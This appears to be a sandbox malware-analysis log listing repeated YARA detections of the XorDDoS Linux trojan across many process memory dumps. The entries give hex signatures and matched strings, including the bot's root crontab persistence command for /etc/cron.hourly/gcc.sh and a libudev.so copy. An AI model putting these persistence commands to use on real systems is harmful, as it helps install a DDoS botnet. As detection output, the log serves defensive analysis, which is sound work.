6275.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6313.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6313.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6313.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6313.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6313.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6313.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6313.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6342.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6278.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6278.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6278.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6278.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6278.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6278.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6278.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6379.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6379.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6379.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6379.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6379.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6379.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6379.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6322.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
